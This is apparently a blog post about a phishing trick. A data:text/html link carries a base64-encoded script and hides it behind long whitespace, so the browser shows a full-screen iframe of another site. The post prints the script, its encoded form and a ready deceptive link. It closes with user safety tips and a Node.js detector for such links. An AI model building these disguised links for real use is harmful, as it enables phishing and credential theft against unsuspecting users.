Sneaky phishing method in modern browsers

Chrome, Firefox and most other modern browsers allow you to execute base64-encoded data via data:text/html. For example, we could prepend „data:text/html,“ to a trustworthy URL like „“ and, instead of loading the displayed URL, execute a bunch of other stuff encoded in the script tag that follows (yeah, I know a programmer would not fall for it, but your parents will!).

data:text/html, <script src=data:text/html;base64,{BASE64 ENCODED JS}></script>

{BASE64 ENCODED JS} can be replaced with any JavaScript. With a few lines of code we can load anything we want and make the user believe he is browsing on

window.document.title = "Some test title";
window.document.body.outerHTML = "<iframe src=\"\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
window.document.body.style.padding = "0";
window.document.body.style.margin = "0";

The whole code base64 encoded:



data:text/html, <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>

Add some spaces to the URL and build a simple link so it doesn’t look suspicious, and here we go:

<a href="data:text/html,                                                                                                                                                                                                                                                                        <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>">Click here to load in an iframe via js</a>


Removed some spaces from the snippet.
So many spaces that the script isn’t even visible.







How can I prevent getting phished like this?

  1. Use password managers that preserve your login URLs (KeePass, 1Password, etc.).
  2. Don’t click on stuff in e-mails ;D
  3. Check the certificate in your browser.
  4. Never log in on any site after you opened it from an email.
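
On the receiving side, a mail filter or link scanner can catch this pattern before anyone clicks. The following Node.js sketch is an added example, not part of the original post: it flags links in an HTML message body whose href is a data: URL and reports why each one looks suspicious. The function names, the 20-character padding threshold and the sample message are assumptions made for illustration.

```javascript
// Added example (not from the original post): flag links whose href is a data: URL.
// findDataUriLinks and the 20-character padding threshold are assumptions of this sketch.
const PADDING_RUN = /(?:\s|%20){20,}/i;
const ACTIVE_TYPES = new Set(["text/html", "application/xhtml+xml", "image/svg+xml"]);

function normalizeHref(raw) {
  // URL parsers drop tabs/newlines and leading/trailing spaces or control characters.
  return raw.replace(/[\t\n\r]/g, "").replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
}

function findDataUriLinks(html) {
  const findings = [];
  // href="...", href='...' or unquoted href on <a> and <area> elements.
  const hrefRe = /<(?:a|area)\b[^>]*?\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  for (const m of html.matchAll(hrefRe)) {
    const href = normalizeHref(m[1] ?? m[2] ?? m[3]);
    if (!/^data:/i.test(href)) continue;
    const comma = href.indexOf(",");
    const header = comma === -1 ? href.slice(5) : href.slice(5, comma);
    const body = comma === -1 ? "" : href.slice(comma + 1);
    // An empty media type defaults to text/plain (RFC 2397).
    const mediaType = header.split(";")[0].trim().toLowerCase() || "text/plain";
    const reasons = [];
    if (ACTIVE_TYPES.has(mediaType)) reasons.push("active-content");
    if (PADDING_RUN.test(body)) reasons.push("whitespace-padding");
    if (/<script\b/i.test(body)) reasons.push("inline-script");
    if (/data:[^,]*;base64,/i.test(body)) reasons.push("nested-base64-data-uri");
    findings.push({ mediaType, reasons, length: href.length });
  }
  return findings;
}

// Constructed sample message body; the payload is a harmless placeholder.
const SAMPLE_HTML = [
  '<a href="https://example.com/login">Normal link</a>',
  '<a href="data:text/html,' + " ".repeat(200) +
    '<script src=data:text/html;base64,Y29uc29sZS5sb2coMSk=></script>">Padded link</a>',
  "<a href='DATA:image/png;base64,iVBORw0KGgo='>Inline image</a>",
].join("\n");

console.log(JSON.stringify(findDataUriLinks(SAMPLE_HTML), null, 2));
```

A link with an empty reasons list is still a data: URL and worth a look; the reasons only rank how closely it matches the padded-script pattern shown above.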

More about this topic:

  1. Gist by timruffles
  2. @tomscott
